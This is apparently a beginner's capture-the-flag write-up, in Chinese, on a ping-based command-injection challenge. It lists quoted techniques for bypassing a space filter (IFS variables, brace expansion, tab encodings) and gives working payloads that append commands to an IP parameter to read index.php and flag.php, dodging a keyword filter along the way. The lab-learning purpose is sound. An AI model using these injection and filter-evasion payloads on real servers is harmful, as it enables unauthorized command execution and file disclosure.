这题我现在也不太明白,小白一枚,这只是记录下来以供以首先看到题目就是像传参数,ip这个也在提示我们传入一个ip,我们试试看
随便试一试发现它有ping的功能,很容易联想到命令执行然后我们试一下
当我输入127.0.0.1;cat index.php想查看内容时来了一句脏话,space空格,并且没显示结果联想到可能是空格过滤了
然后就有了搜索如何绕过空格过滤,参考这个大佬总结的,我真的不知道是什么意思
${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS
<
<>
{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来
%20 (space)
%09 (tab)
X=$'cat\x09./flag.php';$X (\x09表示tab,也可以用\x20)
————————————————
版权声明:本文为CSDN博主「Tr0e」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_39190897/article/details/116247765
?ip=127.0.0.0;cat${IFS}$9index.php
输入了这个payload之后发现它还过滤了符号
那我们把大括号删掉?ip=127.0.0.0;cat$IFS$9index.php
此时出现了php代码
/?ip=127.0.0.0;cat$IFS$9flag.php
那我们再看看第一次出现的那个flag.php,然后脏话flag,可能是不让出现flag,那我们替换一下
/?ip=127.0.0.0;cat$IFS$9fla$a.php
最后就是这个payload可以使用,其他的都不行,我试了一些通配符和\都不行